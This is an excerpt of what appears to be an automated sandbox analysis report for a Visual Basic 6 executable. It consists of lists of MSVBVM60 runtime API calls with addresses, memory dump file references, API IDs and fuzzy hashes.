                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 004104ED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$FreeSystem$AnsiMove$#525#616BoundsBstrChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1820427907-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0040C80D
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C81A
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1728155253-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                            • #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                            • #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
                                                                                                                                                            • String ID: VUUU$VUUU$gfff
                                                                                                                                                            • API String ID: 3310697333-2314002932
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,00000000,72A0C33A,7294A3D7), ref: 00416456
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2234381736-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
                                                                                                                                                            • #712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
                                                                                                                                                            • #712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
                                                                                                                                                            • #572.MSVBVM60(00004002), ref: 0040E969
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E974
                                                                                                                                                            • #537.MSVBVM60(00000020), ref: 0040E97F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E98A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9DA
                                                                                                                                                            • #712.MSVBVM60(?,00000000), ref: 0040E9E5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9F0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EA2E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040EAA2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                            • String ID: $file:///
                                                                                                                                                            • API String ID: 1913684286-1087255347
                                                                                                                                                            • Opcode ID: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                            • Instruction ID: 6c3c390ee14800d438280c46509e4d6c9a5a921f8fc3fa6165506003015d033a
                                                                                                                                                            • Opcode Fuzzy Hash: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                            • Instruction Fuzzy Hash: 6551FA71900208EBDB04DFE4DE48BDEBBB4FF08714F208229E612BB2A4DB755A45CB54
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            • #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                            • #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
                                                                                                                                                            • __vbaVarDup.MSVBVM60 ref: 0040FC8A
                                                                                                                                                            • #709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
                                                                                                                                                            • #616.MSVBVM60(00000000,00000000), ref: 0040FCCC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCD7
                                                                                                                                                            • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCF5
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD07
                                                                                                                                                            • #535.MSVBVM60(00000000), ref: 0040FD0E
                                                                                                                                                            • __vbaStrR4.MSVBVM60 ref: 0040FD18
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD23
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD35
                                                                                                                                                            • __vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                            • String ID: yymmdd
                                                                                                                                                            • API String ID: 2807397001-2871001947
                                                                                                                                                            • Opcode ID: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                            • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                                                                            • Opcode Fuzzy Hash: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                            • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?), ref: 0040C984
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040CC42
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 435708370-0
                                                                                                                                                            • Opcode ID: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                            • Instruction ID: a4ec598c1f86ad3a10f33067e1d5db8d23c0cfab8629dd77bc108e4b9737f716
                                                                                                                                                            • Opcode Fuzzy Hash: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                            • Instruction Fuzzy Hash: EDE11775900208EFDB14DFA4C988ADEBBB5FF48700F208269F509B7291D7759985CF64
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                            • String ID: `%@
                                                                                                                                                            • API String ID: 653519621-700023621
                                                                                                                                                            • Opcode ID: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                            • Instruction ID: 012eab173ab8f044d01c72bc6db05120050b8ff049b8a372a5089938a40e6a64
                                                                                                                                                            • Opcode Fuzzy Hash: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                            • Instruction Fuzzy Hash: 5E41DA76900209EBCB04EFE4DE59EDEBB78FB48305F108519F216B71A0DB75AA44CB64
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412439
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412448
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041245C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041247A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412481
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004124C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004124D3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124E3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124FE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412526
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412536
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041253D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412573
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412590
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
